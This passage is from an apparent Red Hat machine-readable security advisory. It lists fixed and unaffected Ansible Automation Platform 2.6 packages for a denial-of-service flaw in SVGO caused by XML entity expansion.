"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445132"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "svgo: SVGO: Denial of Service via XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
